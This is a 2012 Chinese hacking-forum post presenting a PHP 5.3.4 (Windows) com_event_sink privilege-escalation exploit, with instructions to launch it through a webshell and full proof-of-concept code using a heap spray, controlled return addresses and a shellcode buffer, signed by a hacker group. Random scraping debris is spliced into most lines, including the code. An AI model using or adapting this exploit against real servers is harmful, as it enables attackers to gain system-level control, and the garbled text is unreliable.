找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2268|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中9 j: l$ n9 g% N; c# X1 w- u9 e

4 E# s; ^( K. M0 l9 q7 G测试方法如下:cmd /c x:\php\php.exe x:\test.php
: u1 P" `7 E& b0 j/ ?
2 Q( {' f) Q' F- p4 p下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php1 T% h# q) q+ ^$ h$ `7 g. @
这里是两个测试的截图:- f. R& _: x# [# X+ z

5 F- p3 K: g; ?( W$ l6 D
5 I- `" c# B4 v9 \5 h& S# u0 n% X6 x/ i! m" m7 P

, z& ^2 Y: o+ c6 _' r; j2 Z8 l& u
( {8 l9 P7 p5 D) N9 Z3 k0 n0 x成功利用此漏洞的攻击者将获得系统的最高权限
% k% r) G- ^: s  N4 R5 ^2 i$ R
& n4 u' M$ \3 c6 A; w9 n5 i2 z
: `1 u" B+ B8 u8 a) z9 q! \# l
$ K8 P" ^' m- O; _, `; a2 w
+ j/ u7 E2 c! I
9 K9 \7 c1 r% g6 U' [, e, V- |关于漏洞分析稍后附上。一下是PoC代码:
6 B9 P2 W) J- ^* q% ]0 Y$ D4 T4 U$ m' A7 S2 x2 c: m' }
<?php0 o$ C" g$ G6 z) y
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞! ]' g- e" s. U) b' J2 w; [
//$eip ="\x44\x43\x42\x41";/ M* r5 d" n5 e3 i; {: c/ L4 `
$eip= "\x4b\xe8\x57\x78";& S5 h& W: P' \: D3 z. z! a+ w
$eax ="\x80\x01\x8d\x04";
1 r$ h/ F2 r  F' _' S$deodrant="";! d2 y4 I. C; T: f3 g* e
$axespray = str_repeat($eip.$eax,0x80);
+ T+ [6 _/ x2 P/ t5 r//048d0190% N/ Y' L2 n1 u+ `. D' E
echo strlen($axespray);7 H  N3 ~0 \( }7 d# F
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";; j; `( k6 Z! j' T
echo "Silic Group Hacker Army - BlackBap.Org";! e' ^& N( e; I: f" X" U0 S
//19200 ==4B32 4b00
0 l' H& r7 C4 Kfor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}7 ^) S; t+ B* U# s' v6 [
$terminate = "T";7 P& c  U0 B. R/ R" }
$u[] =$deodrant;; O; H1 W; r5 C+ Y9 z
$r[] =$deodrant.$terminate;8 n$ _) f; ]* y+ a$ E
$a[] =$deodrant.$terminate;+ e+ `3 F+ H! S! c$ e7 G# t- ^
$s[] =$deodrant.$terminate;
0 j5 K9 t( w. z# n: E( J//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
& Y# N+ d) u# v3 u" P8 F+ `$vVar = new VARIANT(0x048d0000+180);2 a8 ?1 S( q" R
//弹窗代码(Shellcode). I0 R: ~2 p- x( \2 k9 V
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
7 b) U" t+ i  {! S3 a  o$var2 = new VARIANT(0x41414242);
* X$ Q; q5 {" \$ a2 q& Q8 w2 @; t, Acom_event_sink($vVar,$var2,$buffer);1 z5 ]. M9 Q, [; |5 f& e0 U$ b% o
?>
: O8 V; y$ P! q' j5 s! s* v5 O

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表